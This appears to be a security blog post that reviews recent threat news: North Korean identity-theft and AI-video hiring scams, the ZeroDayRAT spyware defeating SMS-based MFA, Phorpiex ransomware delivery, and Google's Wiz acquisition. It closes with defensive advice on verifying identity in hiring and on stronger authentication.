North Korean Hackers Are Getting Disturbingly Good at Playing the Long Game

Page content

North Korean Hackers Are Getting Disturbingly Good at Playing the Long Game

I’ve been tracking some concerning developments over the past few days that paint a pretty clear picture: state-sponsored threat actors are getting much more sophisticated in their approach to social engineering, and we need to start thinking differently about how we defend against these attacks.

The New Playbook: AI-Generated Videos and Stolen Identities

The most eye-catching story this week involves North Korean hackers using AI-generated video content and ClickFix techniques to target cryptocurrency companies. What’s particularly interesting here is that they’re deploying custom malware for both macOS and Windows systems – showing they’re willing to invest serious resources into these operations.

But here’s what really caught my attention: these same DPRK operatives are now using real LinkedIn profiles of legitimate professionals to apply for remote IT positions. We’re not talking about hastily created fake profiles anymore. They’re stealing complete professional identities, including verified workplace emails and identity badges.

Think about that for a second. Someone could literally be using your LinkedIn profile, your work email, and a photo of your company badge to apply for a job at your client’s organization right now. The level of sophistication here is frankly unsettling.

When MFA Isn’t Enough: The ZeroDayRAT Problem

Speaking of things that should keep us up at night, there’s a new remote access trojan called ZeroDayRAT that’s essentially bringing commercial-grade spyware capabilities to the mass market. This thing can access SIM data, location information, and preview SMS messages – which means attackers have everything they need to bypass most MFA implementations.

We’ve been telling our clients for years that SMS-based two-factor authentication isn’t great, but this really drives the point home. When an attacker can see your text messages in real-time, that six-digit code isn’t protecting much of anything. The researchers are calling it “textbook stalkerware,” and honestly, that’s not hyperbole.

What makes this particularly dangerous is the combination of data it provides. Location data plus SMS access plus the ability to perform targeted social engineering? That’s a recipe for some very convincing account takeover attempts.

The Phorpiex Problem: Old Dogs, New Tricks

Meanwhile, we’re seeing the Phorpiex botnet adapting its tactics to deliver Global Group ransomware through high-volume phishing campaigns. They’re using malicious Windows Shortcut files, which is actually a pretty clever approach – most users don’t think twice about clicking on what looks like a legitimate shortcut.

The “low-noise” approach mentioned in the reporting is worth noting. These aren’t the flashy, attention-grabbing ransomware campaigns we saw a few years ago. They’re flying under the radar, which suggests the operators have learned from watching other groups get too much law enforcement attention.

The Business Side: Google’s $32B Wiz Acquisition

On a completely different note, the EU just unconditionally approved Google’s $32 billion acquisition of Wiz. While this might seem like just another big tech acquisition, it’s actually pretty significant for our industry.

Google’s clearly making a massive bet on cloud security, and frankly, they need to. The fact that they’re willing to spend this much on a relatively young company tells you everything you need to know about where they think the market is heading. For those of us working in cloud security, this probably means more integrated tooling and potentially some interesting new capabilities down the road.

What This Means for Our Defenses

Looking at these stories together, I’m seeing a pattern that should concern all of us. The attackers are getting better at the human element – the social engineering, the identity theft, the patient infiltration of organizations. Meanwhile, our technical defenses are still largely focused on stopping malware after it’s already been delivered.

The LinkedIn impersonation attacks are particularly troubling because they target the hiring process, which is inherently built on trust. How do you verify that the person you’re interviewing is actually who they claim to be when they have legitimate-looking credentials?

We need to start thinking about identity verification in hiring the same way we think about zero trust in network security. Just because someone has the right LinkedIn profile and company email doesn’t mean they are who they claim to be.

The ZeroDayRAT situation reinforces something we already knew but haven’t acted on aggressively enough: SMS-based MFA is fundamentally broken. If you haven’t already moved your organization to app-based or hardware token authentication, this should be the wake-up call you needed.

Sources